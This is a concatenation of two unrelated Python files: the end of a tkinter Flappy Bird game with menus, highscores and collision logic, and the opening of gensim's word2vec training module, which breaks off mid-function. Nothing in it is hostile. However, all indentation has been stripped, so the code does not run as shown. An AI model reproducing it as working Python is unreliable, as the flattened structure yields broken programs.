self.bars_space = int(self.preferences_data['Scales'].split(";")[0]) #space between bars (px)
self.tk = Tk()
self.tk.bind("<Key>", self.keys)
#self.tk.bind("<Destroy>", self.destroy)
menu = Menu(self.tk) #Menu for user
self.tk.config(menu=menu)
def callback():
self.gameover()
def hsc():
#init highscore from my HighscoreManager module
h = HighscoreManager.Highscore(users=os.listdir("C:/Users"), pathinit=home)
hs = h.getTable()
shs = h.getSortedTable(hs) #get sorted highscores
highscore = "Highscores: \n"
for k, v in shs.items():
highscore += str(k)+" "+str(v)+"; "
messagebox.showinfo("OMGames", highscore)
def w_fe():
f = FeedbackInterface.Feedback(pathinit=home, users=os.listdir("C:/Users"))
f.start()
def s_fe():
f = FeedbackInterface.Feedback(pathinit=home, users=os.listdir("C:/Users"))
f.see_feedbacks()
def pref():
#messagebox.showinfo("Missing Option", "This option needs to be continued")
p = Preferences.Preference(pathinit=home)
p.initialization()
self.preferences_data = p.getData()
#print("preferences_data:", self.preferences_data)
#print("\nQUIIIIIIIIIII\n")
self.load_data_pref()
p.mainloop()
def reset():
for file in os.listdir(home+".FlappyBird"):
os.remove(home+".FlappyBird/"+file)
os.rmdir(home+".FlappyBird")
messagebox.showinfo("Info", "Game has been reset")
self.tk.destroy()
sys.exit()
filemenu = Menu(menu, tearoff=0)
feedmenu = Menu(menu, tearoff=0)
prefmenu = Menu(menu, tearoff=0)
menu.add_cascade(label="Game", menu=filemenu)
menu.add_cascade(label="Feedback", menu=feedmenu)
menu.add_cascade(label="Preferences", menu=prefmenu)
feedmenu.add_command(label="Write feedback", command=w_fe)
feedmenu.add_command(label="See feedbacks", command=s_fe)
filemenu.add_command(label="See highscores", command=hsc)
filemenu.add_separator()
filemenu.add_command(label="Quit", command = callback)
prefmenu.add_command(label="Change Settings", command=pref)
prefmenu.add_command(label="Reset game", command=reset)
imgicon = PhotoImage(file=self.dir+'FlappyBird_Game/icon.gif', master=self.tk) #Set icon of game
self.tk.tk.call('wm', 'iconphoto', self.tk._w, imgicon)
self.tk.title("Flappy Bird (OMGames) V3.0.5") #Game title
self.canvas = Canvas(self.tk, width=600, height=500)
self.canvas.pack()
self.score = 0 #Default game values (score, highscore, attempts and whether the game is running)
self.attemps = 1
self.highscore = 0
self.sound = True
self.sound2 = True
self.gameIsRunning = False
self.score_text = self.canvas.create_text(290,20, fill="red", \
font="Purisa 20 bold", \
text="Score: %s Attemps: %s " \
"Highscore: %s" % (self.score, self.attemps, \
self.highscore))
self.canvas2 = Canvas(self.tk, width=600, height=100) #A second canvas for the bottom image
self.canvas2.pack()
self.pause = False #if game is paused
def destroy(self, evt=None):
try:
self.save_highscore()
self.tk.destroy()
except:
pass
def load_data_pref(self):
self.tk.unbind(self.current_pref[0])
self.tk.bind("<Key-l>")#self.preferences_data['Kick-Key'], ball.kick)
self.current_pref = [self.preferences_data['Kick-Key']] + self.preferences_data['Bindings'].split(";")
#print("\n", self.current_pref, self.preferences_data, "\n")
self.bars_space = int(self.preferences_data['Scales'].split(";")[0]) #space between bars (px)
def keys(self, evt):
if evt.keysym == self.current_pref[2] or evt.char == self.current_pref[2]: #For activating development mode
self.dev = (not self.dev)
if self.dev:
print("Development mode activated")
else:
print("Development mode deactivated")
if evt.char == self.current_pref[1] or evt.keysym == self.current_pref[1]: #for pause game
self.pause = not (self.pause)
if self.pause:
self.gameIsRunning = False
print("Game paused")
messagebox.showinfo("OMGames", "Game paused, press p to resume")
else:
print("Game resumed")
messagebox.showinfo("OMGames", "Game will resume after you click the OK button")
self.gameIsRunning = True
self.mainloop()
def play_sound(self, path, bs=False, ks=False): #Play sound effects on a thread so
def pl(pt): #that playback does not block the game loop
playsound(pt)
if bs:
self.sound = True
'''if ks:
self.sound2 = True'''
if not bs:# or not ks:
x = threading.Thread(target=pl, args=(path,))
x.start()
elif bs:
if self.sound:
x = threading.Thread(target=pl, args=(path,))
self.sound = False
x.start()
'''elif ks:
if self.sound2:
x = threading.Thread(target=pl, args=(path,))
self.sound2 = False
x.start()'''
def mainloop(self): #Game Mainloop
try:
while True:
if self.gameIsRunning:
ball.draw() #Draw the bird
pali[pli[0]].draw() #Draw the sticks
pali[pli[1]].draw()
pali[pli[2]].draw()
pali_r[pri[0]].draw()
pali_r[pri[1]].draw()
pali_r[pri[2]].draw()
self.tk.update()
self.canvas.tag_raise(self.score_text)
time.sleep(0.01)
else:
self.tk.update()
except TclError: #the window may already be destroyed (quit or game over)
pass
def gameover(self):
self.gameIsRunning = False #Stop the game after gameover
self.tk.update()
self.play_sound(self.dir+"FlappyBird_Game/FlappyBird_Sounds/hit.mp3")
self.play_sound(self.dir+"FlappyBird_Game/FlappyBird_Sounds/die.mp3")
messagebox.showerror("Game over", "GAME OVER - Your Score is: %s Highscore: %s" % (self.score, \
self.highscore))
self.attemps += 1
self.update_score()
a = messagebox.askyesno("Game", "Do you want to continue playing?")
if a:
load = Tk()
load.title("Attemp retry: %s" % self.attemps)
ll = Label(load, text="Attemp retry: %s" % self.attemps)
ll.pack()
pr = t.Progressbar(load, length=150, value=0)
pr.pack()
vl = 0
while vl <= 135:
pr.config(value=vl)
load.update()
time.sleep(0.7)
vl += randint(0,35)
l = Label(load, text="Done")
l.pack()
time.sleep(2)
self.destroy()
load.destroy()
try:
main(self.attemps, self.highscore, self.dir) #if the user wants to keep playing,
#run main() again for another attempt
except Exception as e:
error = ErrorManager(e)
error.showgui()
error.mainloop()
else:
messagebox.showinfo("Game", "See you Player - Attemps: %s" % self.attemps)
self.save_highscore()
def save_highscore(self):
f2 = open(home+".FlappyBird/highscore.txt", "w") #Save the current highscore
f2.write(str(self.highscore))
f2.close()
try:
self.tk.destroy()
except:
pass
def update_score(self):
self.canvas.itemconfig(self.score_text, text="Score: %s Attempts: %s " \
"Highscore: %s" % (self.score, self.attemps, self.highscore))
self.tk.update()
def GetImageCoords(self, id, cc): #Bounding box [x1, y1, x2, y2] of an image item
xy = self.canvas.coords(id) #canvas.coords() returns only [x, y] for images
xy.append(xy[0]+cc[0]) #add width to get the right edge
xy.append(xy[1]+cc[1]) #add height to get the bottom edge
return xy #4-item list
def collision(self, ball_pos, pos_palo): #Detect overlap between two bounding boxes
if ((ball_pos[0] >= pos_palo[0] and ball_pos[0] <= pos_palo[2]) and \
(ball_pos[1] >= pos_palo[1] and ball_pos[1] <= pos_palo[3])) or \
((ball_pos[2] >= pos_palo[0] and ball_pos[2] <= pos_palo[2]) and \
(ball_pos[3] >= pos_palo[1] and ball_pos[3] <= pos_palo[3])):
return True
return False
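#Worked example for collision(): with ball_pos = [100, 100, 134, 124] and
#pos_palo = [120, 0, 172, 200], the ball's bottom-right corner (134, 124)
#falls inside the pipe's box, so collision() returns True. Only the ball's
#two corners are tested, which is enough in practice because the pipes are
#larger than the bird sprite.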
class Ball():
def __init__(self, game, x, y, image):
self.game = game
self.ih, self.iw = (image.height(), image.width()) #save img width and height
self.xc, self.yc = (x, y)
self.id = self.game.canvas.create_image(x,y, image=image, anchor="nw")
self.y = 0.5
self.game.tk.bind(g.preferences_data['Kick-Key'], self.kick)
self.x = 0
self.s = True
def draw(self):
if self.game.dev and self.s: #dev mode just turned on: create the debug zone once
self.collisionzone = CollisionZone(self.game, self.xc, self.yc, self.xc+self.iw, \
self.yc+self.ih, color="red") #create collision zone
self.s = False #no longer the first frame
self.game.canvas.move(self.id, self.x, int(self.y)) #int(): canvas.move() expects whole pixels
self.y += 0.3 #gravity: the bird accelerates downward
self.game.play_sound(self.game.dir+"FlappyBird_Game/FlappyBird_Sounds/swoosh.mp3", bs=True)
pos = self.game.GetImageCoords(self.id, [self.iw, self.ih])
if self.game.dev:
self.collisionzone.update(pos[0], pos[1], pos[2], pos[3]) #update collision zone
elif not self.s:
del self.collisionzone #delete collision zone
self.s = True
if pos[3] >= 500 or pos[1] <= 0: #if touching the borders
self.game.gameover()
def kick(self, evt):
if self.game.gameIsRunning:
#self.game.play_sound(self.game.dir+"FlappyBird_Game/FlappyBird_Sounds/wing.mp3", bs=True)
self.y -= int(self.game.preferences_data['Scales'].split(";")[1]) #kick the bird upward by Scales[1] pixels (default 14)
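#Physics sketch: self.y is the vertical velocity in px/frame. Each frame adds
#0.3 (gravity) and a kick subtracts Scales[1] (default 14), so between kicks
#the bird traces a parabola at roughly 100 frames/s (the 0.01 s sleep in
#mainloop()).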
class Palo():
def __init__(self, game, x, y, ball, image, image1):
self.game = game
self.ball = ball
self.image = image #top image
self.image1 = image1 #bottom image
self.xc, self.yc = (x, y)
self.id = self.game.canvas.create_image(x,y, image=image1, anchor="nw")
self.x = -1
self.y = 0
self.ih, self.iw = (image.height(), image.width())
self.coord = [x, y, x+self.iw, y+self.ih]
self.side = "bottom" #side of the stick
if self.game.dev:
self.collisionzone = CollisionZone(self.game, self.coord[0], self.coord[1], \
self.coord[2], self.coord[3])
self.s = True
def draw(self):
if self.game.dev and self.s:
self.collisionzone = CollisionZone(self.game, self.xc, self.yc, self.xc+self.iw, \
self.yc+self.ih)
self.s = False
self.game.canvas.move(self.id, int(self.x), self.y)
pos_palo = self.game.GetImageCoords(self.id, [self.iw, self.ih])
self.coord = pos_palo
if self.game.dev:
self.collisionzone.update(self.coord[0], self.coord[1], self.coord[2], self.coord[3])
elif not self.s:
del self.collisionzone
self.s = True
ball_pos = self.game.GetImageCoords(self.ball.id, [self.ball.iw, self.ball.ih])
if self.game.collision(ball_pos, pos_palo): #if touching the ball:
if self.game.dev: #in development mode collisions are not fatal
print("GameOver::Status")
#time.sleep(0.4)
else:
self.game.gameover()
if pos_palo[2] <= 0:
self.game.canvas.delete(self.id)
#choose whether the stick re-enters from the right as a top or a bottom pipe
if randint(0,1): #random choice: top
y = randint(-60, 0)
self.id = self.game.canvas.create_image(600,y, image=self.image, anchor="nw")
self.side = "top"
return
else: #bottom
y = randint(350, 420)
self.id = self.game.canvas.create_image(600,y, image=self.image1, anchor="nw")
self.side = "bottom"
return
if pos_palo[2] == 220: #===SCORE MANIPULATION===
self.game.play_sound(self.game.dir+"FlappyBird_Game/FlappyBird_Sounds/point.mp3")
self.game.score += 1
if self.game.score > self.game.highscore: #if you beat your highscore
self.game.highscore = self.game.score
self.game.update_score()
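#Scoring note: the pipe moves exactly -1 px per frame, so its right edge
#equals 220 on exactly one frame per pass; that is what lets the == check
#above award each pipe's point only once.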
class Palo_Riserva():
def __init__(self, game, palo, side, ball, image, image1):
self.game = game
self.palo = palo
self.ball = ball
self.image = image
self.image1 = image1
self.iw, self.ih = (image.width(), image.height())
#create the stick on the opposite side of its corresponding primary stick
if side == "bottom":
self.id = self.game.canvas.create_image(self.palo.coord[0], \
self.palo.coord[3]+self.game.bars_space, \
image=self.image1, anchor="nw")
elif side == "top":
self.id = self.game.canvas.create_image(self.palo.coord[0], \
(self.palo.coord[1]-self.game.bars_space)-self.ih, \
image=self.image, anchor="nw")
self.x = -1
self.y = 0
self.s = True
tempos = self.game.GetImageCoords(self.id, [self.iw, self.ih]) #a temporary position of the stick
self.xc, self.yc = (tempos[0], tempos[1])
if self.game.dev:
self.collisionzone = CollisionZone(self.game, tempos[0], tempos[1], tempos[2], tempos[3])
def draw(self):
if self.game.dev and self.s:
self.collisionzone = CollisionZone(self.game, self.xc, self.yc, self.xc+self.iw, self.yc+self.ih)
self.s = False
self.game.canvas.move(self.id, self.x, self.y)
pos_palo_r = self.game.GetImageCoords(self.id, [self.iw, self.ih])
ball_pos = self.game.GetImageCoords(self.ball.id, [self.ball.iw, self.ball.ih])
if self.game.dev:
self.collisionzone.update(pos_palo_r[0], pos_palo_r[1], pos_palo_r[2], pos_palo_r[3])
elif not self.s:
del self.collisionzone
self.s = True
if self.game.collision(ball_pos, pos_palo_r): #if touching ball:
if self.game.dev:
print("GameOver::Status")
#time.sleep(0.4)
else:
self.game.gameover()
if pos_palo_r[2] <= 0: #after touching border:
self.game.canvas.delete(self.id)
if self.palo.side == "bottom": #top #if the side of the corrispondent stick is bottom this stick has side top
self.id = self.game.canvas.create_image(self.palo.coord[0], (self.palo.coord[1]-self.game.bars_space) \
-self.ih, image=self.image, anchor="nw")
elif self.palo.side == "top": #bottom
self.id = self.game.canvas.create_image(self.palo.coord[0], self.palo.coord[3]+self.game.bars_space, \
image=self.image1, anchor="nw")
def main(atmp, hs, path): #Main function for running game
global pali, pali_r, pri, pli, ball, g
g = Game(directory=path) #For development mode please write here 'g = Game(dev=True)'
g.attemps = atmp #set game attemps
g.highscore = hs #set game highscore
g.update_score()
if int(g.preferences_data['GamingIntro-Init']):
i = GamingIntro.Intro(dir=path+"FlappyBird_Game/") #Normal Intro for game
i.start_prg()
g.dev = (g.preferences_data['DevMode'] == 'True')
backgroundimage = PhotoImage(file=g.dir+"FlappyBird_Game/background.gif", master=g.tk) #load background image
btm = PhotoImage(file=g.dir+"FlappyBird_Game/bottom.gif", master=g.tk) #load bottom image
bg = g.canvas.create_image(0,0, image=backgroundimage, anchor="nw")
g.canvas2.create_image(0,0, image=btm, anchor="nw")
#===IMG===
palo1 = PhotoImage(file=g.dir+"FlappyBird_Game/palo1.gif", master=g.tk)
palo2 = PhotoImage(file=g.dir+"FlappyBird_Game/palo2.gif", master=g.tk)
bird = PhotoImage(file=g.dir+"FlappyBird_Game/bird.gif", master=g.tk)
#=========
ball = Ball(g, 120, 200, bird) #init the bird class
pali = {} #a dictionary containing all the primary sticks
pali_r = {} #a dictionary containing the secondary sticks
pri = ["rpalo1", "rpalo2", "rpalo3"]
pli = ["palo1", "palo2", "palo3"]
c = 0
for x in [610, 810, 1010]:
y_value = randint(250,300)
pali[pli[c]] = Palo(g, x, y_value, ball, palo1, palo2) #Update dictionaries
pali_r[pri[c]] = Palo_Riserva(g, pali[pli[c]], "top", ball, palo1, palo2)
c += 1
g.gameIsRunning = True #Start Game
messagebox.showinfo("Game", "Game will start when you click the ok button, 'Return' or 'space' key")
g.mainloop() #Start Mainloop
if first_time and (not os.path.exists(home+".FlappyBird/directory.txt")):
tk = Tk()
fcd = open(home+".FlappyBird/directory.txt", "w")
cd = filedialog.askdirectory(title="Select the FlappyBird directory", master=tk) + "/"
fcd.write(cd)
fcd.close()
tk.destroy()
#==========================|PATH AREA|===================================
fcd = open(home+".FlappyBird/directory.txt")
cd = fcd.read().rstrip('\n')
fcd.close()
#========================================================================
if first_time:
fi = GamingIntro.Intro(dir=cd+"FlappyBird_Game/", firsttime=True, button=True) #Intro for first time using the game
#==================|Introduction|======================<
intk = Tk()
intk.title("Introduction OMGames")
messagebox.showinfo("OMGames", "Current files directory: %sFlappyBird_Game/" % cd)
Label(intk, text="INTRODUCTION", font=("bold")).pack()
v1 = "Warning: If there is an \'No such file or directory\' error, please " \
"change the directory file with your \'path\'"
v2 = "Warning: This program creates files: dir: \'.FlappyBird/\'"
v3 = "Warning: Program uses modules: tkinter, random, time, sqlite3, sys, os, " \
"playsound, webbrowser, ErrorCase, HighscoreManager, FeedbackInterface, Preferences and GamingIntro"
v4 = "Warning: This game is for 7+ and is not for videodipendent people (Blocked by waiting) - :-)"
v5 = "All related images are copyright by .GEARS 2013, Program copyright by " \
"OrangoMangoGames 2019-2020 (Paul Kocian)"
v6 = "Keys: Spacebar or left button to kick the bird, p to pause and to resume, F3 for " \
"turning on and off development mode, you can change them"
v7 = "Privacy Therms: Your highscore will be accessible by all the players and you can" \
" see their highscore"
v8 = "Remember that if you close this window, you will in any case accept the Privacy Terms"
labels = []
texts = [v1, v2, v3, v4, v5, v6, v7, v8]
for text in texts:
l = Label(intk, text=text)
l.pack()
labels.append(l)
def com():
messagebox.showinfo("OMGames", "Have fun! And beat your highscores!")
intk.destroy()
return
b = Button(intk, text="Accept Privacy and Continue", command=com)
b.pack()
intk.mainloop()
#======================================================<
if __name__ == '__main__':
try:
i = GamingIntro.Intro(dir=cd+"FlappyBird_Game/") #Normal Intro for game
i.start_prg()
main(1, highscore, cd)
except Exception as e: #Fetch errors
error = ErrorManager(e)
error.showgui()
error.mainloop()
|
word2vec.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Deep learning via word2vec's "skip-gram and CBOW models", using either
hierarchical softmax or negative sampling [1]_ [2]_.
The training algorithms were originally ported from the C package https://code.google.com/p/word2vec/
and extended with additional functionality.
For a blog tutorial on gensim word2vec, with an interactive web app trained on GoogleNews, visit http://radimrehurek.com/2014/02/word2vec-tutorial/
**Install Cython with `pip install cython` to use optimized word2vec training** (70x speedup [3]_).
Initialize a model with e.g.::
>>> model = Word2Vec(sentences, size=100, window=5, min_count=5, workers=4)
Persist a model to disk with::
>>> model.save(fname)
>>> model = Word2Vec.load(fname) # you can continue training with the loaded model!
The model can also be instantiated from an existing file on disk in the word2vec C format::
>>> model = Word2Vec.load_word2vec_format('/tmp/vectors.txt', binary=False) # C text format
>>> model = Word2Vec.load_word2vec_format('/tmp/vectors.bin', binary=True) # C binary format
You can perform various syntactic/semantic NLP word tasks with the model. Some of them
are already built-in::
>>> model.most_similar(positive=['woman', 'king'], negative=['man'])
[('queen', 0.50882536), ...]
>>> model.doesnt_match("breakfast cereal dinner lunch".split())
'cereal'
>>> model.similarity('woman', 'man')
0.73723527
>>> model['computer'] # raw numpy vector of a word
array([-0.00449447, -0.00310097, 0.02421786, ...], dtype=float32)
and so on.
If you're finished training a model (=no more updates, only querying), you can do
>>> model.init_sims(replace=True)
to trim unneeded model memory = use (much) less RAM.
.. [1] Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. Efficient Estimation of Word Representations in Vector Space. In Proceedings of Workshop at ICLR, 2013.
.. [2] Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg Corrado, and Jeffrey Dean. Distributed Representations of Words and Phrases and their Compositionality.
In Proceedings of NIPS, 2013.
.. [3] Optimizing word2vec in gensim, http://radimrehurek.com/2013/09/word2vec-in-python-part-two-optimizing/
"""
import logging
import sys
import os
import heapq
import time
from copy import deepcopy
import threading
try:
from queue import Queue
except ImportError:
from Queue import Queue
from numpy import exp, dot, zeros, outer, random, dtype, get_include, float32 as REAL,\
uint32, seterr, array, uint8, vstack, argsort, fromstring, sqrt, newaxis, ndarray, empty, sum as np_sum
# logger = logging.getLogger("gensim.models.word2vec")
logger = logging.getLogger("sent2vec")
# from gensim import utils, matutils # utility fnc for pickling, common scipy operations etc
import utils, matutils # utility fnc for pickling, common scipy operations etc
from six import iteritems, itervalues, string_types
from six.moves import xrange
try:
from gensim_addons.models.word2vec_inner import train_sentence_sg, train_sentence_cbow, FAST_VERSION
except ImportError:
try:
# try to compile and use the faster cython version
import pyximport
models_dir = os.path.dirname(__file__) or os.getcwd()
pyximport.install(setup_args={"include_dirs": [models_dir, get_include()]})
from word2vec_inner import train_sentence_sg, train_sentence_cbow, FAST_VERSION
except:
# failed... fall back to plain numpy (20-80x slower training than the above)
FAST_VERSION = -1
def train_sentence_sg(model, sentence, alpha, work=None):
"""
Update skip-gram model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary). Called internally from `Word2Vec.train()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
if model.negative:
# precompute negative labels
labels = zeros(model.negative + 1)
labels[0] = 1.0
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(model.window) # `b` in the original word2vec code
# now go over all words from the (reduced) window, predicting each one in turn
start = max(0, pos - model.window + reduced_window)
for pos2, word2 in enumerate(sentence[start : pos + model.window + 1 - reduced_window], start):
# don't train on OOV words and on the `word` itself
if word2 is not None and pos2 != pos:
l1 = model.syn0[word2.index]
neu1e = zeros(l1.shape)
if model.hs:
# work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
l2a = deepcopy(model.syn1[word.point]) # 2d matrix, codelen x layer1_size
fa = 1.0 / (1.0 + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1 - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < model.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
model.syn0[word2.index] += neu1e # learn input -> hidden
return len([word for word in sentence if word is not None])
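# Gradient note for both branches above: with a binary target t (1 - word.code
# for hierarchical softmax, the `labels` vector for negative sampling) and a
# prediction f = sigmoid(l1 . l2), the error signal is (t - f). Scaled by the
# learning rate it becomes ga/gb, which updates the output vectors via
# outer(g, l1) and accumulates the input-side correction neu1e via dot(g, l2).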
def train_sentence_cbow(model, sentence, alpha, work=None, neu1=None):
"""
Update CBOW model by training on a single sentence.
The sentence is a list of Vocab objects (or None, where the corresponding
word is not in the vocabulary). Called internally from `Word2Vec.train()`.
This is the non-optimized, Python version. If you have cython installed, gensim
will use the optimized version from word2vec_inner instead.
"""
if model.negative:
# precompute negative labels
labels = zeros(model.negative + 1)
labels[0] = 1.
for pos, word in enumerate(sentence):
if word is None:
continue # OOV word in the input sentence => skip
reduced_window = random.randint(model.window) # `b` in the original word2vec code
start = max(0, pos - model.window + reduced_window)
window_pos = enumerate(sentence[start : pos + model.window + 1 - reduced_window], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.syn0[word2_indices], axis=0) # 1 x layer1_size
if word2_indices and model.cbow_mean:
l1 /= len(word2_indices)
neu1e = zeros(l1.shape)
if model.hs:
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
fa = 1. / (1. + exp(-dot(l1, l2a.T))) # propagate hidden -> output
ga = (1. - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < model.negative + 1:
w = model.table[random.randint(model.table.shape[0])]
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
fb = 1. / (1. + exp(-dot(l1, l2b.T))) # propagate hidden -> output
gb = (labels - fb) * alpha # vector of error gradients multiplied by the learning rate
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
model.syn0[word2_indices] += neu1e # learn input -> hidden, here for all words in the window separately
return len([word for word in sentence if word is not None])
class Vocab(object):
"""A single vocabulary item, used internally for constructing binary trees (incl. both word leaves and inner nodes)."""
def __init__(self, **kwargs):
self.count = 0
self.__dict__.update(kwargs)
def __lt__(self, other): # used for sorting in a priority queue
return self.count < other.count
def __str__(self):
vals = ['%s:%r' % (key, self.__dict__[key]) for key in sorted(self.__dict__) if not key.startswith('_')]
return "<" + ', '.join(vals) + ">"
class Word2Vec(utils.SaveLoad):
"""
Class for training, using and evaluating neural networks described in https://code.google.com/p/word2vec/
The model can be stored/loaded via its `save()` and `load()` methods, or stored/loaded in a format
compatible with the original word2vec implementation via `save_word2vec_format()` and `load_word2vec_format()`.
"""
def __init__(self, sentences=None, size=100, alpha=0.025, window=5, min_count=5,
sample=0, seed=1, workers=1, min_alpha=0.0001, sg=1, hs=1, negative=0, cbow_mean=0):
"""
Initialize the model from an iterable of `sentences`. Each sentence is a
list of words (unicode strings) that will be used for training.
The `sentences` iterable can be simply a list, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`BrownCorpus`, :class:`Text8Corpus` or :class:`LineSentence` in
this module for such examples.
If you don't supply `sentences`, the model is left uninitialized -- use if
you plan to initialize it in some other way.
`sg` defines the training algorithm. By default (`sg=1`), skip-gram is used. Otherwise, `cbow` is employed.
`size` is the dimensionality of the feature vectors.
`window` is the maximum distance between the current and predicted word within a sentence.
`alpha` is the initial learning rate (will linearly drop to zero as training progresses).
`seed` = for the random number generator.
`min_count` = ignore all words with total frequency lower than this.
`sample` = threshold for configuring which higher-frequency words are randomly downsampled;
default is 0 (off), useful value is 1e-5.
`workers` = use this many worker threads to train the model (=faster training with multicore machines)
`hs` = if 1 (default), hierarchical softmax will be used for model training (else set to 0)
`negative` = if > 0, negative sampling will be used, the int for negative
specifies how many "noise words" should be drawn (usually between 5-20)
`cbow_mean` = if 0 (default), use the sum of the context word vectors. If 1, use the mean.
Only applies when cbow is used.
"""
self.vocab = {} # mapping from a word (string) to a Vocab object
self.index2word = [] # map from a word's matrix index (int) to word (string)
self.sg = int(sg)
self.table = None # for negative sampling --> this needs a lot of RAM! consider setting back to None before saving
self.layer1_size = int(size)
if size % 4 != 0:
logger.warning("consider setting layer size to a multiple of 4 for greater performance")
self.alpha = float(alpha)
self.window = int(window)
self.seed = seed
self.min_count = min_count
self.sample = sample
self.workers = workers
self.min_alpha = min_alpha
self.hs = hs
self.negative = negative
self.cbow_mean = int(cbow_mean)
if sentences is not None:
self.build_vocab(sentences)
self.train(sentences)
def make_table(self, table_size=100000000, power=0.75):
"""
Create a table using stored vocabulary word counts for drawing random words in the negative
sampling training routines.
Called internally from `build_vocab()`.
"""
logger.info("constructing a table with noise distribution from %i words" % len(self.vocab))
# table (= list of words) of noise distribution for negative sampling
vocab_size = len(self.index2word)
self.table = zeros(table_size, dtype=uint32)
if not vocab_size:
logger.warning("empty vocabulary in word2vec, is this intended?")
return
# compute sum of all power (Z in paper)
train_words_pow = float(sum([self.vocab[word].count**power for word in self.vocab]))
# go through the whole table and fill it up with the word indexes proportional to a word's count**power
widx = 0
# normalize count^0.75 by Z
d1 = self.vocab[self.index2word[widx]].count**power / train_words_pow
for tidx in xrange(table_size):
self.table[tidx] = widx
if 1.0 * tidx / table_size > d1:
widx += 1
d1 += self.vocab[self.index2word[widx]].count**power / train_words_pow
if widx >= vocab_size:
widx = vocab_size - 1
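# With power=0.75 a word's share of the table is count**0.75 / Z rather than
# count / N, which damps very frequent words and boosts rare ones. Drawing a
# negative sample is then a single uniform index into the table, as done in
# train_sentence_sg(): w = self.table[random.randint(self.table.shape[0])]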
def create_binary_tree(self):
"""
Create a binary Huffman tree using stored vocabulary word counts. Frequent words
will have shorter binary codes. Called internally from `build_vocab()`.
"""
logger.info("constructing a huffman tree from %i words" % len(self.vocab))
# build the huffman tree
heap = list(itervalues(self.vocab))
heapq.heapify(heap)
for i in xrange(len(self.vocab) - 1):
min1, min2 = heapq.heappop(heap), heapq.heappop(heap)
heapq.heappush(heap, Vocab(count=min1.count + min2.count, index=i + len(self.vocab), left=min1, right=min2))
# recurse over the tree, assigning a binary code to each vocabulary word
if heap:
max_depth, stack = 0, [(heap[0], [], [])]
while stack:
node, codes, points = stack.pop()
if node.index < len(self.vocab):
# leaf node => store its path from the root
node.code, node.point = codes, points
max_depth = max(len(codes), max_depth)
else:
# inner node => continue recursion
points = array(list(points) + [node.index - len(self.vocab)], dtype=uint32)
stack.append((node.left, array(list(codes) + [0], dtype=uint8), points))
stack.append((node.right, array(list(codes) + [1], dtype=uint8), points))
logger.info("built huffman tree with maximum node depth %i" % max_depth)
def precalc_sampling(self):
"""Precalculate each vocabulary item's threshold for sampling"""
if self.sample:
logger.info("frequent-word downsampling, threshold %g; progress tallies will be approximate" % (self.sample))
total_words = sum(v.count for v in itervalues(self.vocab))
threshold_count = float(self.sample) * total_words
for v in itervalues(self.vocab):
prob = (sqrt(v.count / threshold_count) + 1) * (threshold_count / v.count) if self.sample else 1.0
v.sample_probability = min(prob, 1.0)
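# Worked example: with sample=1e-5 on a 10M-word corpus, threshold_count=100.
# A word seen 10,000 times gets prob = (sqrt(10000/100) + 1) * (100/10000)
# = 11 * 0.01 = 0.11, so it is kept ~11% of the time, while words at or below
# the threshold keep sample_probability = 1.0.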
def build_vocab(self, sentences):
"""
Build vocabulary from a sequence of sentences (can be a once-only generator stream).
Each sentence must be a list of unicode strings.
"""
logger.info("collecting all words and their counts")
sentence_no, vocab = -1, {}
total_words = 0
for sentence_no, sentence in enumerate(sentences):
if sentence_no % 10000 == 0:
logger.info("PROGRESS: at sentence #%i, processed %i words and %i word types" %
(sentence_no, total_words, len(vocab)))
for word in sentence:
total_words += 1
if word in vocab:
vocab[word].count += 1
else:
vocab[word] = Vocab(count=1)
logger.info("collected %i word types from a corpus of %i words and %i sentences" %
(len(vocab), total_words, sentence_no + 1))
# assign a unique index to each word
self.vocab, self.index2word = {}, []
for word, v in iteritems(vocab):
if v.count >= self.min_count:
v.index = len(self.vocab)
self.index2word.append(word)
self.vocab[word] = v
logger.info("total %i word types after removing those with count<%s" % (len(self.vocab), self.min_count))
if self.hs:
# add info about each word's Huffman encoding
self.create_binary_tree()
if self.negative:
# build the table for drawing random words (for negative sampling)
self.make_table()
# precalculate downsampling thresholds
self.precalc_sampling()
self.reset_weights()
def train(self, sentences, total_words=None, word_count=0, chunksize=100):
"""
Update the model's neural weights from a sequence of sentences (can be a once-only generator stream).
Each sentence must be a list of unicode strings.
"""
if FAST_VERSION < 0:
import warnings
warnings.warn("Cython compilation failed, training will be slow. Do you have Cython installed? `pip install cython`")
logger.info("training model with %i workers on %i vocabulary and %i features, "
"using 'skipgram'=%s 'hierarchical softmax'=%s 'subsample'=%s and 'negative sampling'=%s" %
(self.workers, len(self.vocab), self.layer1_size, self.sg, self.hs, self.sample, self.negative))
if not self.vocab:
